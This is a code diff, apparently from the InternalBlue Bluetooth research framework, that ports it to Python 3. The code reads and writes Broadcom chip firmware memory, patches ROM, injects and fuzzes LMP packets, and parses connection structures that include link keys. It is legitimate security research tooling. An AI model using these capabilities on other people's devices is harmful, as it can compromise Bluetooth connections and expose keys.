actions = ['list', 'add', 'run', 'remove']
for keyword in list(keywords):
keywords.extend(['%s %s' % (keyword, action) for action in actions])
for action in actions:
keywords.append('%s %s' % (keyword, action))
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
@@ -1437,7 +1528,7 @@ class CmdCustom(Cmd):
return True
if args.do == 'list':
custom_cmds= ["\t%s\t\t%s\n" % (k, v) for k, v in sorted(CmdCustom.custom_commands.iteritems())]
custom_cmds= ["\t%s\t\t%s\n" % (k, v) for k, v in sorted(CmdCustom.custom_commands.items())]
log.info("Custom commands:\n%s" % ''.join(custom_cmds))
return True
@@ -1522,7 +1613,7 @@ class CmdReadAfhChannelMap(Cmd):
if connection == None:
continue
else:
self.readafh(connection["connection_handle"])
self.readafh(connection.connection_handle)
return True
# if not set but connection struct unknown, typical connection handles seem to be 0x0b...0x0d
else:
@@ -1535,15 +1626,15 @@ class CmdReadAfhChannelMap(Cmd):
"""
response = self.internalblue.sendHciCommand(0x1406, p16(handle))
if len(response) < 17 or response[8:] == '\x00'*9:
if len(response) < 17 or response[8:] == b'\x00'*9:
log.info("Connection 0x%04x is not established." % handle)
return False
log.info("Connection Handle: 0x%04x" % handle)
log.info("AFH Enabled: %s" % bool(response[7] != '\x00'))
log.info("AFH Enabled: %s" % bool(response[7] != 0))
channels = ""
for c in response[8:]:
bits = format(ord(c), '08b')
bits = format(c, '08b')
for b in bits:
if b == "1":
channels = channels + " *"
@@ -1570,10 +1661,18 @@ class CmdSendDiagCmd(Cmd):
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("--type", type=auto_int, default=0x07,
help="Type. Default is 0x07, but you can use 0x02 for ACL and 0x03 for SCO."
"Other values might crash.")
parser.add_argument("data", nargs="*",
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), Get Memory Dump (f3), Packet Test (f6).")
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). "
"Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), "
"Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), "
"Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), "
"Get Memory Dump (f3), Packet Test (f6).")
def work(self):
args = self.getArgs()
if not args or not args.data:
return True
@@ -1585,7 +1684,7 @@ class CmdSendDiagCmd(Cmd):
else:
data += data_part.decode('hex')
self.internalblue.sendH4(0x07, data)
self.internalblue.sendH4(args.type, data)
return True
internalblue/core.py
+278 -141
View File
@@ -25,20 +25,44 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from abc import ABCMeta, abstractmethod
from pwn import *
from fw.fw import Firmware
from .fw.fw import Firmware
import datetime
import time
import Queue
import hci
import queue as queue2k
from . import hci
from .objects.queue_element import QueueElement
from .objects.connection_information import ConnectionInformation
from future.utils import with_metaclass
from internalblue.utils import bytes_to_hex
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Union, NewType, Callable
from internalblue import Address, Record, Task, HCI_CMD, FilterFunction, ConnectionNumber, ConnectionDict, \
ConnectionIndex, BluetoothAddress, HeapInformation, QueueInformation, Opcode
from internalblue.hci import HCI
from . import DeviceTuple
if TYPE_CHECKING:
pass
except:
pass
class InternalBlue:
__metaclass__ = ABCMeta
#import logging
#log = logging.getLogger(__name__)
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
class InternalBlue(with_metaclass(ABCMeta, object)):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory=".", replay=False):
# type: (int, str, str, bool, str, bool) -> None
context.log_level = log_level
context.log_file = data_directory + '/_internalblue.log'
context.arch = "thumb"
@@ -48,11 +72,11 @@ class InternalBlue:
self.data_directory = data_directory
self.s_inject = None # This is the TCP socket to the HCI inject port
self.s_snoop = None # This is the TCP socket to the HCI snoop port
self.s_inject = None #type: socket.socket # This is the TCP socket to the HCI inject port
self.s_snoop = None #type: socket.socket # This is the TCP socket to the HCI snoop port
# If btsnooplog_filename is set, write all incomming HCI packets to a file (can be viewed in wireshark for debugging)
if btsnooplog_filename != None:
if btsnooplog_filename is not None:
self.write_btsnooplog = True
self.btsnooplog_file = open(self.data_directory + "/" + btsnooplog_filename, "wb")
else:
@@ -78,12 +102,12 @@ class InternalBlue:
# firmware (the response is recognized with the help of the filter function).
# Once the response arrived, it puts the response into the response_queue from
# the tuple. See sendH4() and sendHciCommand().
self.sendQueue = Queue.Queue(queue_size)
self.sendQueue = queue2k.Queue(queue_size) # type: Queue.Queue[Task]
self.recvThread = None # The thread which is responsible for the HCI snoop socket
self.sendThread = None # The thread which is responsible for the HCI inject socket
self.tracepoints = [] # A list of currently active tracepoints
self.tracepoints = [] # A list of currently active tracepoints
# The list contains tuples:
# [0] target address
# [1] address of the hook code
@@ -103,7 +127,7 @@ class InternalBlue:
# filter_function will be called for each packet that is received and only if it returns
# True, the packet will be put into the queue. The filter_function can be None in order
# to put all packets into the queue.
self.registeredHciRecvQueues = []
self.registeredHciRecvQueues = [] # type: List[Tuple[Queue.Queue[Record], FilterFunction]]
self.exit_requested = False # Will be set to true when the framework wants to shut down (e.g. on error or user exit)
self.running = False # 'running' is True once the connection to the HCI sockets is established
@@ -120,6 +144,9 @@ class InternalBlue:
self.registerHciCallback(self.connectionStatusCallback)
self.registerHciCallback(self.coexStatusCallback)
# If the --replay flag was used and a chip is spoofed.
self.replay = replay
def check_binutils(self, fix=True):
"""
Test if ARM binutils is in path so that asm and disasm (provided by
@@ -162,6 +189,7 @@ class InternalBlue:
return False
def _parse_time(self, time):
# type: (Any) -> datetime.datetime
"""
Taken from: https://github.com/joekickass/python-btsnoop
@@ -175,12 +203,14 @@ class InternalBlue:
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(microseconds=time) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
@abstractmethod
def _recvThreadFunc(self):
# type: () -> None
pass
def _sendThreadFunc(self):
# type: () -> None
"""
This is the run-function of the sendThread. It polls the sendQueue for new 'send tasks'
and executes them (sends H4 commands to the chip and returns the response).
@@ -203,7 +233,7 @@ class InternalBlue:
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except Queue.Empty:
except queue2k.Empty:
continue
# Extract the components of the task
@@ -219,8 +249,21 @@ class InternalBlue:
# HCICore: need to manually save the data to btsnoop log as it is not
# reflected to us as with adb
if self.__class__.__name__ == "ADBCore":
# prepend with total length for H4 over adb
data = p16(len(data)) + data
# prepend with total length for H4 over adb with modified Bluetooth module
if not self.serial:
data = p16(len(data)) + data
# If we do not have a patched module, we write to the serial using the same socket.
# Echoing HCI commands to the serial interface has the following syntax:
#
# echo -ne "\x01\x4c\xfc\x05\x33\x22\x11\x00\xaa"
# 0x01: HCI command
# 0xfc4c: Write RAM
# 0x05: Parameter length
# 0x3322...: Parameters
#
# ...and that's how the data is formatted already anyway
elif self.__class__.__name__ == "HCICore":
if self.write_btsnooplog:
# btsnoop record header data:
@@ -242,15 +285,17 @@ class InternalBlue:
# if the caller expects a response: register a queue to receive the response
if queue != None and filter_function != None:
recvQueue = Queue.Queue(1)
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Send command to the chip using s_inject socket
try:
log.debug("_sendThreadFunc: Send: " + str(out.encode('hex')))
log.debug("_sendThreadFunc: Send: " + bytes_to_hex(out))
self.s_inject.send(out)
except:
log.warn("_sendThreadFunc: Sending to socket failed, reestablishing connection.\nWith HCI sockets, some HCI commands require root!")
except socket.error:
pass
except socket.error as e:
log.warn("_sendThreadFunc: Sending to socket failed with {}, reestablishing connection.\nWith HCI sockets, some HCI commands require root!".format(e))
# socket are terminated by hcicore..
self._teardownSockets()
self._setupSockets()
@@ -262,7 +307,7 @@ class InternalBlue:
record = recvQueue.get(timeout=2)
hcipkt = record[0]
data = hcipkt.data
except Queue.Empty:
except queue2k.Empty:
log.warn("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
@@ -274,6 +319,7 @@ class InternalBlue:
log.debug("Send Thread terminated.")
def _tracepointHciCallbackFunction(self, record):
# type: (Record) -> None
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
@@ -296,7 +342,7 @@ class InternalBlue:
registers += "r10: 0x%08x r11: 0x%08x r12: 0x%08x\n" % \
tuple(self.tracepoint_registers[13:16])
log.info("Tracepoint 0x%x was hit and deactivated:\n" % pc + registers)
filename = self.data_directory + "/" + "internalblue_tracepoint_registers_%s.bin" % datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
log.info("Captured Registers for Tracepoint to %s" % filename)
f = open(filename, "w")
@@ -320,7 +366,7 @@ class InternalBlue:
if self.tracepoint_memdump_address == None:
self.tracepoint_memdump_address = dump_address
normalized_address = dump_address - self.tracepoint_memdump_address
normalized_address = dump_address - self.tracepoint_memdump_address
self.tracepoint_memdump_parts[normalized_address] = data
# Check if this was the last packet
@@ -335,6 +381,7 @@ class InternalBlue:
def addTracepoint(self, address):
# type: (Address) -> bool
# Check if constants are defined in fw.py
for const in ['TRACEPOINT_BODY_ASM_LOCATION', 'TRACEPOINT_BODY_ASM_SNIPPET',
'TRACEPOINT_HOOK_ASM', 'TRACEPOINT_HOOKS_LOCATION',
@@ -428,6 +475,7 @@ class InternalBlue:
return True
def deleteTracepoint(self, address):
# type: (Address) -> bool
if not self.check_running():
return False
@@ -447,6 +495,7 @@ class InternalBlue:
return True
def check_running(self):
# type: () -> bool
"""
Check if the framework is running (i.e. the sockets are connected,
the recv and send threads are running and exit_requested is not True)
@@ -462,10 +511,11 @@ class InternalBlue:
@abstractmethod
def device_list(self):
# type: () -> List[DeviceTuple]
pass
def connect(self):
# type: () -> bool
if self.exit_requested:
self.shutdown()
@@ -497,7 +547,7 @@ class InternalBlue:
# register hci callback:
self.registerHciCallback(self.stackDumpReceiver.recvPacket)
if not self.initialize_fimware():
log.warn("connect: Failed to initialize firmware!")
return False
@@ -509,16 +559,17 @@ class InternalBlue:
@abstractmethod
def local_connect(self):
return True
def initialize_fimware(self):
# type: () -> bool
"""
Checks if we are running on a Broadcom chip and loads available firmware information based
on LMP subversion.
"""
# send Read_Local_Version_Information
version = self.sendHciCommand(0x1001, '')
version = self.sendHciCommand(0x1001, ''.encode('utf-8'))
if not version or len(version) < 11:
log.warn("""initialize_fimware: Failed to send a HCI command to the Bluetooth driver.
adb: Check if you installed a custom bluetooth.default.so properly on your
@@ -527,22 +578,28 @@ class InternalBlue:
return False
# Broadcom uses 0x000f as vendor ID, Cypress 0x0131
vendor = (u8(version[9]) << 8) + u8(version[8])
vendor = (version[9] << 8) + version[8]
if vendor != 0xf and vendor != 0x131:
log.critical("Not running on a Broadcom or Cypress chip!")
return False
else:
subversion = (u8(version[11]) << 8) + u8(version[10])
self.fw = Firmware(subversion).firmware
subversion = (version[11] << 8) + version[10]
iOS = False
if self.__class__.__name__ == "iOSCore":
iOS = True
self.fw = Firmware(subversion, iOS).firmware
# Safe to turn diagnostic logging on, it just gets a timeout if the Android
# driver was recompiled with other flags but without applying a proper patch.
log.info("Try to enable debugging on H4 (warning if not supported)...")
self.enableBroadcomDiagnosticLogging(True)
return True
def shutdown(self):
# type: () -> None
"""
Shutdown the framework by stopping the send and recv threads. Socket shutdown
also terminates port forwarding if adb is used.
@@ -575,6 +632,7 @@ class InternalBlue:
log.info("Shutdown complete.")
def registerHciCallback(self, callback):
# type: (Callable[[Record], None ]) -> None
"""
Add a new callback function to self.registeredHciCallbacks.
The function will be called every time the recvThread receives
@@ -594,6 +652,7 @@ class InternalBlue:
self.registeredHciCallbacks.append(callback)
def unregisterHciCallback(self, callback):
# type: (Callable[[Tuple[HCI, int, int, int, Any, datetime.datetime]], None ]) -> None
"""
Remove a callback function from self.registeredHciCallbacks.
"""
@@ -604,6 +663,7 @@ class InternalBlue:
log.warn("registerHciCallback: no such callback is registered!")
def registerHciRecvQueue(self, queue, filter_function=None):
# type: (Queue.Queue[Record], FilterFunction) -> None
"""
Add a new queue to self.registeredHciRecvQueues.
The queue will be filled by the recvThread every time the thread receives
@@ -626,6 +686,7 @@ class InternalBlue:
self.registeredHciRecvQueues.append((queue, filter_function))
def unregisterHciRecvQueue(self, queue):
# type: (Queue.Queue[Tuple[HCI, int, int, int, Any, datetime]]) -> None
"""
Remove a queue from self.registeredHciRecvQueues.
"""
@@ -636,7 +697,8 @@ class InternalBlue:
return
log.warn("registerHciRecvQueue: no such queue is registered!")
def sendHciCommand(self, opcode, data, timeout=2):
def sendHciCommand(self, opcode, data, timeout=3):
# type: (Opcode, bytes, int) -> Optional[bytearray]
"""
Send an arbitrary HCI command packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
@@ -648,7 +710,7 @@ class InternalBlue:
# return this instead of the Command Complete Event (which will
# follow later and will be ignored). This should be fixed..
queue = Queue.Queue(1)
queue = queue2k.Queue(1)
# standard HCI command structure
payload = p16(opcode) + p8(len(data)) + data
@@ -656,6 +718,7 @@ class InternalBlue:
# define a filter function which recognizes the response (command complete
# or command status event).
def recvFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
log.debug("sendHciCommand.recvFilterFunction: got response")
@@ -677,14 +740,19 @@ class InternalBlue:
timeout=timeout)
ret = queue.get(timeout=timeout)
return ret
except Queue.Empty:
except queue2k.Empty:
log.warn("sendHciCommand: waiting for response timed out!")
# If there was no response because the Trace Replay Hook throw an assert it will be in this attribute.
# Raise this so the main thread doesn't ignore this and it will be caught by any testing framework
if hasattr(self, 'test_failed'):
raise self.test_failed
return None
except Queue.Full:
except queue.Full:
log.warn("sendHciCommand: send queue is full!")
return None
def sendH4(self, h4type, data, timeout=2):
# type: (HCI_CMD, bytes, int) -> bool
"""
Send an arbitrary H4 packet by pushing a send-task into the
sendQueue. This function does not wait for a response! If you
@@ -696,11 +764,12 @@ class InternalBlue:
try:
self.sendQueue.put((h4type, data, None, None), timeout=timeout)
return True
except Queue.Full:
except queue.Full:
log.warn("sendH4: send queue is full!")
return False
def recvPacket(self, timeout=None):
# type: (Optional[int]) -> Optional[Record]
"""
This function polls the recvQueue for the next available HCI
packet and returns it. The function checks whether it is called
@@ -713,7 +782,7 @@ class InternalBlue:
a blocking manner. Consider using the registerHciCallback()
functionality as an alternative which works asynchronously.
"""
log.debug("recvPacket: called")
if not self.check_running():
@@ -721,10 +790,11 @@ class InternalBlue:
try:
return self.recvQueue.get(timeout=timeout)
except Queue.Empty:
except queue2k.Empty:
return None
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, int, Optional[Any], int, int) -> Optional[bytes]
"""
Reads <length> bytes from the memory space of the firmware at the given
address. Reading from unmapped memory or certain memory-mapped-IO areas
@@ -743,11 +813,11 @@ class InternalBlue:
read_addr = address # read_addr is the address of the next Read_RAM HCI command
byte_counter = 0 # tracks the number of received bytes
outbuffer = '' # buffer which stores all accumulated data read from the chip
outbuffer = bytearray() # buffer which stores all accumulated data read from the chip
if bytes_total == 0: # If no total bytes where given just use length
bytes_total = length
retry = True # Retry once on failures
while(read_addr < address+length): # Send HCI Read_RAM commands until all data is received
bytes_total = length
retry = 3 # Retry on failures
while read_addr < address+length: # Send HCI Read_RAM commands until all data is received
# Send hci frame
bytes_left = length - byte_counter
blocksize = bytes_left
@@ -757,18 +827,28 @@ class InternalBlue:
# Send Read_RAM (0xfc4d) command
response = self.sendHciCommand(0xfc4d, p32(read_addr) + p8(blocksize))
if (response == None or response == False):
log.warning("readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)" % (read_addr, length))
if response is None or not response:
log.warn("readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)" % (read_addr, length))
# Retry once...
if retry:
if retry > 0:
log.debug("readMem: retrying once...")
retry = False
retry = retry - 1
continue
else:
log.warning("readMem: failed!")
return None
status = ord(response[3])
data = response[4:] # start of the actual data is at offset 4
if len(data) == 0: # this happens i.e. if not called on a brcm chip
log.warn("readMem: empty response, quitting...")
break
if len(data) != blocksize:
log.debug("readMem: insufficient bytes returned, retrying...")
continue
status = response[3]
if status != 0:
# It is not yet reverse engineered what this byte means. For almost
# all memory addresses it will be 0. But for some it will be different,
@@ -776,24 +856,30 @@ class InternalBlue:
# 0x00 (0) means everything okay
# 0x12 means Command Disallowed
# e.g. for address 0xff000000 (aka 'EEPROM') it is 0x12
log.warning("readMem: [TODO] Got status != 0 : error 0x%02X" % status)
data = response[4:] # start of the actual data is at offset 4
outbuffer += data
if (len(data) == 0): #this happens i.e. if not called on a brcm chip
log.warn("readMem: empty response, quitting...")
log.warn("readMem: [TODO] Got status != 0 : error 0x%02X at address 0x%08x" % (status, read_addr))
break
# do double checking, but prevent loop
if self.doublecheck and retry > 0:
response_check = self.sendHciCommand(0xfc4d, p32(read_addr) + p8(blocksize))
if response != response_check:
log.debug("readMem: double checking response failed at 0x%x! retry..." % read_addr)
sleep(0.3)
retry = retry - 1
continue
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if(progress_log != None):
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, (bytes_done+byte_counter)*100/bytes_total)
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, old_div((bytes_done+byte_counter)*100,bytes_total))
progress_log.status(msg)
retry = True # this round worked, so we re-enable this flag
retry = 3 # this round worked, so we re-enable retries
return outbuffer
def readMemAligned(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, int, Optional[Any], int, int) -> Any
"""
This is an alternative to readMem() which enforces a strictly aligned access
to the memory that is read. This is needed for e.g. the memory-mapped-IO
@@ -829,8 +915,9 @@ class InternalBlue:
log.warn("readMemAligned: address (0x%x) must be 4-byte aligned!" % address)
return None
recvQueue = Queue.Queue(1)
recvQueue = queue2k.Queue(1)
def hciFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return False
@@ -854,20 +941,24 @@ class InternalBlue:
blocksize = 244
# Customize the assembler snippet with the current read_addr and blocksize
code = asm(self.fw.READ_MEM_ALIGNED_ASM_SNIPPET % (blocksize, read_addr, blocksize/4), vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION, arch='thumb')
code = asm(self.fw.READ_MEM_ALIGNED_ASM_SNIPPET % (blocksize, read_addr, old_div(blocksize,4)), vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION, arch='thumb')
# Write snippet to the RAM (TODO: maybe backup and restore content of this area?)
self.writeMem(self.fw.READ_MEM_ALIGNED_ASM_LOCATION, code)
# Run snippet
if not self.launchRam(self.fw.READ_MEM_ALIGNED_ASM_LOCATION):
log.error("readMemAligned: launching assembler snippet failed!")
return None
# on iOSCore the return value might be wrong
if self.doublecheck:
log.debug("readMemAligned: probably failed, but continuing...")
else:
log.error("readMemAligned: launching assembler snippet failed!")
return None
# wait for the custom HCI event sent by the snippet:
try:
record = recvQueue.get(timeout=1)
except Queue.Empty:
except queue2k.Empty:
log.warn("readMemAligned: No response from assembler snippet.")
return None
@@ -876,15 +967,16 @@ class InternalBlue:
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if(progress_log != None):
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, (bytes_done+byte_counter)*100/bytes_total)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, old_div((bytes_done+byte_counter)*100,bytes_total))
progress_log.status(msg)
self.unregisterHciRecvQueue(recvQueue)
return outbuffer
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, bytes, Optional[Any], int, int) -> Optional[bool]
"""
Writes the <data> to the memory space of the firmware at the given
address.
@@ -897,7 +989,7 @@ class InternalBlue:
"""
log.debug("writeMem: writing to 0x%x" % address)
if not self.check_running():
return None
@@ -916,8 +1008,8 @@ class InternalBlue:
if(response == None):
log.warn("writeMem: Timeout while reading response, probably need to wait longer.")
return False
elif (response[3] != '\x00'):
log.warn("writeMem: Got error code %s in command complete event." % response[3].encode('hex'))
elif (response[3] != 0):
log.warn("writeMem: Got error code %s in command complete event." % bytes_to_hex(response[3]))
return False
write_addr += blocksize
byte_counter += blocksize
@@ -927,31 +1019,33 @@ class InternalBlue:
return True
def launchRam(self, address):
# type: (int) -> bool
"""
Executes a function at the specified address in the context of the HCI
handler thread. The function has to comply with the calling convention.
As the function blocks the HCI handler thread, the chip will most likely
crash (or be resetted by Android) if the function takes too long.
"""
response = self.sendHciCommand(0xfc4e, p32(address))
if (response == None):
if response is None:
log.warn("Empty HCI response during launchRam, driver crashed due to invalid code or destination")
return False
if(response[3] != '\x00'):
log.warn("Got error code %x in command complete event." % response[3])
error_code = response[3]
if error_code != 0:
log.warn("Got error code %x in command complete event." % error_code)
return False
# Nexus 6P Bugfix
if ('LAUNCH_RAM_PAUSE' in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE):
if 'LAUNCH_RAM_PAUSE' in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE:
log.debug("launchRam: Bugfix, sleeping %ds" % self.fw.LAUNCH_RAM_PAUSE)
time.sleep(self.fw.LAUNCH_RAM_PAUSE)
return True
def getPatchramState(self):
# type: () -> Tuple[List[Optional[int]], List[Any], List[Any]]
"""
Retrieves the current state of the patchram unit. The return value
is a tuple containing 3 lists which are indexed by the slot number:
@@ -968,25 +1062,25 @@ class InternalBlue:
return False
slot_count = self.fw.PATCHRAM_NUMBER_OF_SLOTS
# On Nexus 5, ReadMemAligned is required, while Nexus 6P supports this memory area with ReadRAM
if self.fw.PATCHRAM_ALIGNED:
slot_dump = self.readMemAligned(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, slot_count/4)
slot_dump = self.readMemAligned(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count,4))
table_addr_dump = self.readMemAligned(self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count*4)
else:
slot_dump = self.readMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, slot_count/4)
slot_dump = self.readMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count,4))
table_addr_dump = self.readMem(self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count*4)
table_val_dump = self.readMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS, slot_count*4)
table_addresses = []
table_values = []
slot_dwords = []
slot_bits = []
for dword in range(slot_count/32):
for dword in range(old_div(slot_count,32)):
slot_dwords.append(slot_dump[dword*32:(dword+1)*32])
for dword in slot_dwords:
slot_bits.extend(bits(dword[::-1])[::-1])
slot_bits.extend(bits(bytes(dword[::-1]))[::-1])
for i in range(slot_count):
if slot_bits[i]:
table_addresses.append(u32(table_addr_dump[i*4:i*4+4])<<2)
@@ -997,6 +1091,7 @@ class InternalBlue:
return (table_addresses, table_values, slot_bits)
def patchRom(self, address, patch, slot=None):
# type: (int, Any, Optional[Any]) -> bool
"""
Patch a 4-byte value (DWORD) inside the ROM section of the firmware
(0x0 - 0x8FFFF) using the patchram mechanism. There are 128 available
@@ -1021,7 +1116,7 @@ class InternalBlue:
if len(patch) != 4:
log.warn("patchRom: patch (%s) must be a 32-bit dword!" % patch)
return False
log.debug("patchRom: applying patch 0x%x to address 0x%x" % (u32(patch), address))
alignment = address % 4
@@ -1046,7 +1141,7 @@ class InternalBlue:
slot = i
log.info("patchRom: Reusing slot for address 0x%x: %d" % (address,slot))
# Write new value to patchram value table at 0xd0000
self.writeMem(0xd0000 + slot*4, patch)
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot*4, patch)
return True
if slot == None:
@@ -1071,13 +1166,14 @@ class InternalBlue:
# Enable patchram slot (enable bitfield starts at 0x310204)
# (We need to enable the slot by setting a bit in a multi-dword bitfield)
target_dword = int(slot / 32)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 1
slot_dword = unbits(table_slots[target_dword*32:(target_dword+1)*32][::-1])[::-1]
self.writeMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword*4, slot_dword)
return True
def disableRomPatch(self, address, slot=None):
# type: (int, Optional[int]) -> bool
"""
Disable a patchram slot (see also patchRom()). The slot can either be
specified by the target address (address that was patched) or by providing
@@ -1098,7 +1194,7 @@ class InternalBlue:
if address == None:
log.warn("disableRomPatch: address is None.")
return False
for i in range(128):
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
log.info("Slot for address 0x%x is: %d" % (address,slot))
@@ -1109,7 +1205,7 @@ class InternalBlue:
# Disable patchram slot (enable bitfield starts at 0x310204)
# (We need to disable the slot by clearing a bit in a multi-dword bitfield)
target_dword = int(slot / 32)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 0
slot_dword = unbits(table_slots[target_dword*32:(target_dword+1)*32][::-1])[::-1]
self.writeMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword*4, slot_dword)
@@ -1120,6 +1216,7 @@ class InternalBlue:
return True
def readConnectionInformation(self, conn_number):
# type: (ConnectionNumber) -> Optional[ConnectionInformation]
"""
Reads and parses a connection struct based on the connection number.
Note: The connection number is different from the connection index!
@@ -1130,7 +1227,7 @@ class InternalBlue:
In the Nexus 5 firmware all connection numbers are simply the connection
index increased by 1.
The return value is a dictionary containing all information that could
The return value is a ConnectionInformation object containing all information that could
be parsed from the connection structure. If the connection struct at the
specified connection number is empty, the return value is None.
"""
@@ -1141,7 +1238,7 @@ class InternalBlue:
for const in ['CONNECTION_MAX', 'CONNECTION_ARRAY_ADDRESS', 'CONNECTION_STRUCT_LENGTH']:
if const not in dir(self.fw):
is_array = False
# Do we have a list implementation?
for const in ['CONNECTION_LIST_ADDRESS']:
if const not in dir(self.fw):
@@ -1165,26 +1262,13 @@ class InternalBlue:
if connection == b'\x00'*self.fw.CONNECTION_STRUCT_LENGTH:
return None
conn_dict = {}
conn_dict["connection_number"] = u32(connection[:4])
conn_dict["remote_address"] = connection[0x28:0x2E][::-1]
conn_dict["remote_name_address"] = u32(connection[0x4C:0x50])
conn_dict["master_of_connection"] = u32(connection[0x1C:0x20]) & 1<<15 == 0
conn_dict["connection_handle"] = u16(connection[0x64:0x66])
conn_dict["public_rand"] = connection[0x78:0x88]
#conn_dict["pin"] = connection[0x8C:0x92]
#conn_dict["bt_addr_for_key"] = connection[0x92:0x98][::-1]
effective_key_len = u8(connection[0xa7:0xa8])
conn_dict["effective_key_len"] = effective_key_len
conn_dict["link_key"] = connection[0x68:0x68+effective_key_len]
#new fields - TODO verify
conn_dict["tx_pwr_lvl_dBm"] = u8(connection[0x9c:0x9d]) - 127
conn_dict["extended_lmp_feat"] = connection[0x30:0x38] #standard p. 527
conn_dict["host_supported_feat"] = connection[0x38:0x40]
conn_dict["id"] = connection[0x0c:0x0d] #not sure if this is an id?
conn_dict = ConnectionInformation.from_connection_buffer(connection)
return conn_dict
def sendLmpPacket(self, opcode, payload='', is_master=True, conn_handle=0x0c, extended_op=False):
# type: (Opcode, Any, bool, ConnectionNumber, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
@@ -1205,50 +1289,51 @@ class InternalBlue:
Returns True on success and False on failure.
"""
# Check the connection handle
# Range: 0x0000-0x0EFF (all other values reserved for future use)
if conn_handle < 0 or conn_handle > 0x0EFF:
log.warn("sendLmpPacket: connection handle out of bounds: %d" % conn_handle)
return False
# must be string...
if payload == None:
payload = ''
if ((not extended_op) and opcode > (0xff>>1)) or (extended_op and opcode > 0xff):
log.warn("sendLmpPacket: opcode out of range!")
return False
# Build the LMP packet
opcode_data = p8(opcode<<1 | (not is_master)) if not extended_op else p8(0x7F<<1 | (not is_master)) + p8(opcode)
# Nexus 5 (2012) simply takes any length as argument, but later withdraws bytes if too many were passed.
# Nexus 6P, Raspi 3+ and evaulation board (2014-2018) require a fixed 20 byte length parameter to be passed!
# -> 2 bytes connection handle, 1 byte length, which means 17 bytes for opcode and payload remaining
# sendlmp --data 11223344556677889900112233445566 01 -> actually works
# always pad to 17 data bytes...
data = opcode_data + payload + '\x00'*(17 - len(opcode_data) - len(payload))
if len(data) > 17:
log.warn("sendLmpPacket: Vendor specific HCI command only allows for 17 bytes LMP content.")
#log.info("packet: " + p16(conn_handle) + p8(len(data)) + data)
result = self.sendHciCommand(0xfc58, p16(conn_handle) + p8(len(payload + opcode_data)) + data)
if result == None:
log.warn("sendLmpPacket: did not get a result from firmware, maybe crashed internally?")
return False
result = u8(result[3])
if result != 0:
log.warn("sendLmpPacket: got error status 0x%02x" % result)
return False
return True
def fuzzLmp(self):
# type: ()-> bool
"""
Installs a patch inside the sendLmp HCI handler that allows sending arbitrary
LMP payloads. Afterwards, use sendLmpPacket as before.
@@ -1276,6 +1361,7 @@ class InternalBlue:
return True
def sendLmpPacketLegacy(self, conn_nr, opcode, payload, extended_op=False):
# type: (int, Opcode, bytes, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
